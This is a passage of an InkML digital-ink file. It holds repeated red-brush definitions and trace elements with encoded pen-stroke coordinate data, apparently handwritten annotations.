    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">332 88 24575,'-4'-2'0,"1"0"0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-4-4 0,-7-7 0,1 7 0,-1 1 0,1 0 0,-1 1 0,0 1 0,0 0 0,-1 0 0,1 1 0,-19-1 0,21 2 0,1 1 0,0 0 0,-1 1 0,1-1 0,-1 2 0,-15 2 0,22-2 0,1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,-1 6 0,-2 21 0,2 0 0,0 1 0,3-1 0,5 48 0,-4-65 0,0 0 0,1 1 0,0-1 0,1 0 0,1-1 0,0 1 0,1-1 0,0 0 0,0 0 0,2-1 0,-1 0 0,1 0 0,1-1 0,10 10 0,12 8 0,1-2 0,1-1 0,42 24 0,-39-26 0,50 41 0,5 3 0,-60-46 0,-19-12 0,1-1 0,0 0 0,28 12 0,-31-16 0,-1 1 0,1 0 0,-1 1 0,0-1 0,0 2 0,-1 0 0,0 0 0,8 8 0,23 20 0,-33-30 0,2 0 0,0 1 0,-1 1 0,0-1 0,0 1 0,11 16 0,-17-22 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,1 0 0,-1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,-2 1 0,-30 20 0,-2-1 0,-1-1 0,-75 28 0,56-20 0,48-22 0,-1-1 0,-1 0 0,1 0 0,-1-1 0,0 0 0,0 0 0,0-1 0,0-1 0,-14 2 0,22-4 0,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-3 0,-2-6 0,1 1 0,0-1 0,-2-17 0,2-26 0,5-91 0,-1 129 0,1-1 0,0 1 0,1 0 0,1 0 0,12-27 0,43-63 0,-42 77 0,25-46 0,-24 45 0,30-55 0,-6 6 0,-41 74-78,4-4-137,-1 0 1,0-1-1,-1 1 1,0-1-1,5-18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6.983"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'1'21'0,"0"-1"0,1 0 0,1 1 0,1-1 0,1-1 0,0 1 0,2-1 0,0 0 0,1 0 0,14 23 0,-15-27 0,-1-1 0,-1 0 0,0 1 0,-1 0 0,3 23 0,11 37 0,15 50 0,-17-58 0,18 54 0,10 32 0,30 107 0,-61-191 0,-9-42 0,1-1 0,2 0 0,0 0 0,15 33 0,7 12 0,-21-48 0,1-2 0,1 1 0,13 21 0,-9-26 0,-10-15 0,-8-13 0,0 4 19,0 1 0,-1 0 1,0 0-1,0 0 0,-1 1 0,-11-9 0,9 7-394,0 0 0,1 0 1,-9-11-1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49.505"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 287 24575,'1'3'0,"0"0"0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,5 5 0,4 7 0,11 27 0,-17-29 0,1-1 0,1 0 0,11 17 0,-15-26 0,0 0 0,-1 0 0,1 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,-1 1 0,1-1 0,8 1 0,-4 0 0,1-1 0,-1 0 0,0 0 0,1-1 0,-1 0 0,0-1 0,1 0 0,-1 0 0,0 0 0,0-1 0,0-1 0,0 1 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0-1 0,0 1 0,0-1 0,0 0 0,10-12 0,-10 10 0,-1 0 0,0-1 0,0 1 0,-1-1 0,0-1 0,0 1 0,-1-1 0,0 0 0,0 0 0,-1 0 0,0 0 0,1-10 0,2-9 0,-1-1 0,-2 1 0,0-1 0,-2 0 0,-4-45 0,3 70 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,-1-1 0,1 2 0,-1-1 0,0 0 0,0 0 0,0 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,-6-1 0,-10-1 0,-1 0 0,1 2 0,0 0 0,-29 3 0,16-1 0,11-1-1365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52.277"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">660 1369 24575,'-1'66'0,"0"-7"0,2 0 0,13 83 0,-10-103 0,0 1 0,-5 69 0,3 29 0,8-65 0,-5-46 0,1 47 0,-4-53 0,0-1 0,5 21 0,3 29 0,-7-39 0,2 0 0,12 40 0,1 12 0,-14-62 0,4 19 0,-3 1 0,2 54 0,-8-64 0,0-2 0,2 0 0,0 0 0,11 57 0,-10-77 0,0 0 0,1 0 0,0-1 0,0 1 0,1-1 0,0 1 0,1-1 0,9 13 0,-6-8 0,0 1 0,-1 0 0,0 0 0,-1 1 0,5 20 0,-7-22 0,0 1 0,1-1 0,1 0 0,0-1 0,0 1 0,2-1 0,10 14 0,-13-21 0,0 0 0,0-1 0,1 1 0,0-1 0,-1-1 0,2 1 0,-1-1 0,0 0 0,1 0 0,-1-1 0,1 0 0,0 0 0,-1 0 0,12 0 0,11 0 0,-1 0 0,38-5 0,-13 1 0,-16 2 0,-8 1 0,1-2 0,0-1 0,48-9 0,-56 7 0,1 1 0,-1 1 0,29 1 0,-34 1 0,0 0 0,-1-1 0,1 0 0,0-1 0,-1-1 0,1-1 0,20-8 0,-23 7 0,0 1 0,0 0 0,0 0 0,0 2 0,29-3 0,77 7 0,-47 0 0,924-1-1539,-496-2 3078,-489 0-1539,-1 0 0,1-1 0,-1 0 0,1-1 0,-1-1 0,16-6 0,29-9 0,186-44 0,-188 45 0,-31 9 0,47-10 0,18 0 0,43-6 0,-80 17 0,-12 2 0,66-2 0,-73 7 0,0-2 0,0-1 0,0-2 0,-1-1 0,51-18 0,-41 14 0,61-9 0,-53 11 0,-45 9 0,0-2 0,0 1 0,0 0 0,-1-1 0,1 1 0,0-1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 0 0,4-4 0,2-4 0,-1-1 0,11-19 0,-13 20 0,1 0 0,16-19 0,7-6 0,-22 25 0,1 0 0,1 1 0,15-14 0,-15 15 0,0-1 0,0 0 0,-1 0 0,0-1 0,-1 0 0,0 0 0,0-1 0,-2 0 0,1-1 0,4-13 0,3-15 0,17-79 0,-22 80 0,2 1 0,27-63 0,-22 63 0,14-55 0,-18 55 0,27-62 0,-6 19 0,-23 57 0,26-45 0,-21 44 0,14-36 0,-17 29-177,-2 0 1,-1-1-1,-1-1 0,2-38 0,-2 23-80,16-58 1,8-44-229,-27 111 553,3-22 317,0-66 1,-7 70 43,14-109 0,-9 112-369,-3 0-1,-5-73 1,0 29-54,2 74-6,1 8 0,-1 0 0,-3-20 0,2 33 0,1 1 0,-1-1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,-5-5 0,1 2 0,1 1 0,-2-1 0,1 1 0,-1 0 0,0 1 0,0 0 0,-1 0 0,1 1 0,-1 0 0,-11-3 0,-32-10 0,27 8 0,0 1 0,0 2 0,-1 0 0,0 1 0,-32 0 0,20 2-274,1-1 0,-44-11 0,41 7-57,-66-5 0,-26 3 166,-29-2 197,-79-1 19,105 3-382,14 1-1187,-71-3 1638,-684 13-3039,801 2 2919,-90 16 0,-47 3 0,48-9-289,72-4 168,-77 11 578,84-9 181,-92 2-1,113-13-637,-241 12 0,-169 36 0,18 8 0,419-51 0,-64 9 128,21-5 167,1 3 1,0 4 0,-97 33-1,128-34 85,36-12-136,0 1-1,0 0 1,0 0-1,0 1 1,1 1-1,-21 12 1,32-17-243,-1-1 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 1,-1 1-1,1-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 1,0 0-1,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 1,1 0-1,-1 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,0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52.828"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">24 0 24575,'0'501'0,"-1"-485"0,-1-1 0,0 1 0,-5 15 0,3-15 0,1 1 0,-2 23 0,6 309-1365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10:53.606"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 32 24575,'1'0'0,"0"1"0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 2 0,13 23 0,-11-19 0,93 162 0,-81-142 0,-1-1 0,0-1 0,35 44 0,-15-26 0,-26-31 0,1-1 0,0 0 0,0-1 0,19 16 0,-24-23 0,0 0 0,0-1 0,0 1 0,1-1 0,-1 0 0,1-1 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,1-1 0,0 1 0,5-2 0,15-5 0,0-1 0,0-1 0,0-2 0,-1 0 0,-1-1 0,0-2 0,-1 0 0,0-1 0,31-29 0,-37 30 0,2 2 0,20-12 0,-21 14 0,-1-1 0,29-24 0,-31 24 0,-1 1 0,2 1 0,-1 0 0,18-8 0,27-17 0,-48 27 0,0 1 0,1 1 0,0 0 0,0 0 0,16-3 0,34-14 0,-29 7 0,161-70 0,-175 80 65,36-7 0,10-1-1560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5.553"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">741 1 24575,'-49'0'0,"-92"3"0,122-1 0,1 1 0,-1 0 0,1 2 0,0 0 0,-27 12 0,22-8 0,-49 13 0,49-16 0,-42 16 0,57-18 0,0 0 0,0 1 0,1 0 0,-1 0 0,1 0 0,0 1 0,0 0 0,-9 12 0,-4 6 0,2 1 0,0 1 0,2 1 0,-24 52 0,31-58 0,2 1 0,0 1 0,1-1 0,2 1 0,0 0 0,1 0 0,1 28 0,1-25 0,1 0 0,2 0 0,0 0 0,2 0 0,0 0 0,17 49 0,-8-40 0,2-1 0,35 58 0,-41-76 0,1-1 0,0 0 0,1-1 0,1-1 0,0 0 0,1 0 0,1-1 0,17 12 0,39 27 0,-40-28 0,44 26 0,59 15-624,-69-36 629,-24-11-5,66 18 0,-69-28-849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56.220"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 25 24575,'0'0'0,"1"-1"0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,2 0 0,33-4 0,-32 3 0,74-3 0,108 9 0,-184-5 0,0 0 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1 3 0,0 10 0,0 0 0,-1 0 0,-3 27 0,0-14 0,2-5 0,1 0 0,1 0 0,1 0 0,1 0 0,1-1 0,9 33 0,1-12 0,-7-20 0,1-1 0,0 1 0,19 33 0,-22-48 0,-1 1 0,0 0 0,0 0 0,2 13 0,11 30 0,-11-41 0,-2 0 0,1 1 0,-1-1 0,-1 1 0,-1-1 0,0 1 0,1 23 0,-3-30 0,0-1 0,0 1 0,0 0 0,-1 0 0,0-1 0,0 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,0-1 0,0 0 0,-6 6 0,-20 11 0,-41 22 0,39-25 0,-36 27 0,58-37 0,0 0 0,1 1 0,0-1 0,1 2 0,0 0 0,0 0 0,-9 17 0,-30 49-1365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4.987"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'0'37'0,"2"-1"0,1 0 0,2 0 0,15 60 0,51 223-2686,-69-307 2677,1 11 9,-1 1 0,0 29 0,-3-31 0,2 0 0,7 40 0,9 56 864,-8-44 33,21 55-557,-16-75-328,6 68 434,-2-5-310,17 77-428,-5-17 41,3 16 250,-17-84 1,35 113 217,-14-75 20,-29-91-147,-21-81-90,7 16 0,1 0 0,1 0 0,-7-19 0,5-8 0,3 0 0,1 0 0,2-1 0,6-53 0,-3 66-1365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5.966"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 116 24575,'1829'0'-5979,"-1668"-12"5976,-5 1 0,-9 1 3,-2-1 0,-100 10 668,67-11 0,-55 6-668,70 1 0,-70 5 0,74-11 0,-88 6-9,50 1 1,36-4 208,-39-1 1302,128 5 0,-154 4-40,-28-3-1462,-30 2 0,0 0 0,-1 0 0,1 1 0,0 0 0,0 0 0,7 1 0,-11 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 3 0,245 458-940,-175-339 954,-46-83-185,-2 1 1,32 74-1,74 165-3223,-93-209 3075,19 27 319,14 30 0,-60-106 0,26 60 0,59 98 0,-4-19-383,-12-20 73,-50-89 698,28 75-1,8 17 160,90 137-547,-139-255 464,-3 2 1,0-1-1,-2 1 1,0 1-1,10 55 1,-10-38 393,31 84 0,0-5-839,-32-97-19,-7-23 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 12 0,-3-16 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-3 0 0,-22 17 0,6-4 0,0-1 0,-1-1 0,-1-1 0,1-1 0,-34 12 0,-90 34-326,98-36 125,-1-3 1,-80 20-1,79-30-603,-62 1 0,18-2-107,-330 35-2374,12-10 2709,266-23 454,-140 3 129,6 2-7,248-12 0,-479 5-495,294-9 550,65 0 220,-165 4 557,216 9-427,-29 0 189,-336-12 5060,422 7-5549,34-4-106,0 0 1,0-1 0,-17 1 0,24-2 0,-1-1 0,1 1 0,-1 0 0,0-1 0,1 0 0,0 1 0,-1-1 0,1 0-1,-1 0 1,1 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-2-3 0,-8-11-170,0-1-1,1-1 0,1 0 1,0 0-1,2-1 0,0 0 1,-6-24-1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6.450"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'2'0'0,"1"1"0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,-1 0 0,1-1 0,0 1 0,1 2 0,23 33 0,-23-32 0,14 23 0,24 60 0,-33-68 0,0 0 0,2 0 0,0-1 0,1-1 0,1 1 0,27 31 0,-22-32 0,-2 2 0,0-1 0,-1 2 0,12 24 0,24 34 0,-33-54 0,0 1 0,-1 0 0,-2 2 0,0-1 0,-2 2 0,12 44 0,-14-47 0,0 0 0,2-1 0,1 0 0,18 27 0,22 42 0,-40-69 0,1 0 0,31 41 0,-45-64 0,1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,1-2 0,5-6 0,-1-1 0,-1 0 0,0 0 0,0-1 0,3-14 0,4-17 0,49-197 0,-38 130 0,-2-19 0,-21 127-114,1-1 1,-1 1-1,1-1 0,0 1 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 1,1 0-1,1-3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6.813"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">12 1 24575,'-1'2'0,"-1"-1"0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,1 0 0,3 2 0,24 9 0,-12-5 0,0 0 0,-1 1 0,24 16 0,-35-20 0,1 1 0,-1-1 0,0 1 0,0 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,0 0 0,4 14 0,-2-4 0,4 12 0,0 0 0,21 40 0,-28-65 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 1 0,5 1 0,-9-5-296,0 1 274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7.375"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 154 24575,'28'-10'0,"-10"3"0,20-3 0,51-7 0,22-4 0,-96 17-37,-1-1 1,-1 0-1,1-1 0,-1 0 0,0-1 0,0-1 0,-1 0 1,16-14-1,-4 5-997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7.192"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'0'4'0,"0"4"0,0 5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7.549"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">27 0 24575,'-1'25'0,"-9"48"0,5-47 0,-1 46 0,4-25 0,0-27 0,2 0 0,0 0 0,1 0 0,0 0 0,2 0 0,10 39 0,-9-50 0,1 1 0,0-1 0,0 0 0,8 9 0,-10-14 0,0 0 0,0 0 0,1-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 0 0,1-1 0,4 4 0,1-4-165,-1 0-1,1 0 1,-1-1-1,1 0 1,-1-1-1,12-1 0,-19 1-40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7:59.849"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">2 1 24575,'-2'91'0,"4"101"0,2-171 0,0 0 0,1-1 0,2 1 0,11 28 0,7 18 0,55 268 0,-36-127-643,-12 58 643,-23-171 0,3 58 0,-12-126 1,-1-4 2,1-1 0,1 1 1,1-1-1,1 1 0,1-1 0,11 37 0,-9-39 42,0 1 0,5 39 1,-9-39 75,2-1 0,0 0 0,10 26 0,-3-14-121,-8-22 0,0 0 0,1-1 0,-1 0 0,2 1 0,-1-1 0,1 0 0,7 9 0,-19-27 14,-1 0-1,1-1 0,0 1 0,1-1 1,0-1-1,1 1 0,0-1 1,-5-17-1,5 10-261,0 0 1,2 0-1,0 0 1,1 0-1,0-25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0.627"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 306 24575,'2'-3'0,"0"0"0,1 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,4-2 0,-1 0 0,27-14 0,2 2 0,0 1 0,0 2 0,42-10 0,-61 20 0,1 0 0,-1 1 0,30 1 0,-27 1 0,0-1 0,28-5 0,10-2-152,1 2 0,0 3 0,77 5 0,-25 1-202,152-17-815,-83 2 1169,-20 3 0,119-17-1964,-138 19 1390,33-4 167,113-11-578,267-8 1717,-516 30-540,0-2 0,54-9 0,-65 7 734,0 0 0,0 2 1,1 1-1,34 4 0,-59-3-920,-1 0-1,0 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 1 0,1-1 1,0 0-1,-1 1 1,1-1-1,-1 1 1,0 0-1,0-1 1,1 1-1,-1 0 1,0 0-1,1 3 1,1 4-9,0 0-1,0 0 1,-1 1 0,1 10 0,5 20 9,16 43-321,13 90 0,-20-86 197,69 282-375,27 139-305,-84-357-51,14 99-815,-29-143 1625,1 1-86,0 137 1,-12-190 478,18 106 1,-1-18 30,-12-87-385,19 73 0,2 7 0,9 21 2632,-18-88-1827,-14-45-542,-1-4-247,0-1-1,13 29 0,42 91-15,-61-139-20,1 0-1,0 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 0,1 1 1,0-1-1,-1 0 0,1 0 1,0 1-1,-1-1 0,1 0 1,0 0-1,-1 1 0,1-1 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 1 0,0-1 0,-1 0 1,1 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,-1 1 0,1-1 1,0 1-1,0-1 0,1 0 1,-1 1-1,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,1-1 0,-1 0 1,0 1-1,0-1 0,1 1 1,-1-1-1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1.096"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 329 24575,'1'-4'0,"-1"1"0,1-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,4-1 0,9-5 0,1 1 0,0 0 0,23-5 0,-6 1 0,-9 2 0,-10 3 0,0 0 0,0 1 0,1 1 0,0 0 0,0 2 0,22-2 0,-17 2 34,39-7 0,16-1-860,51-1 659,37-1 182,-3 1 153,-11 1-2161,636 9 167,-379 2 1815,-368-3 692,1-2 0,69-17 0,-33 6 820,-67 13-1377,0 0 0,1 0 1,-1-1-1,-1 0 0,11-5 0,-16 6-184,0 0 0,0 1 0,0-1 0,0 0-1,-1-1 1,1 1 0,-1 0 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0-1,-1 0 1,1 0 0,-1 0 0,2-4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1.632"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">308 1 24575,'0'28'0,"0"1"0,-2-1 0,-10 48 0,7-51 0,-2 39 0,6-44 0,-1-1 0,-1 1 0,-1-1 0,-6 19 0,-25 84 0,27-87 0,-2-1 0,-1-1 0,-28 60 0,30-73 0,0 0 0,1 1 0,1 1 0,-4 22 0,-2 7 0,-11 13 0,18-51 0,1 1 0,0 0 0,1 1 0,0-1 0,1 1 0,-2 17 0,7 21 0,-1-40 0,0-1 0,-1 1 0,-1-1 0,0 0 0,-4 21 0,5-32 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0 0 0,-10-12 0,-4-24 0,12 12-67,1-1 0,1 0 0,2-26 0,-1 23-1030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2.028"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
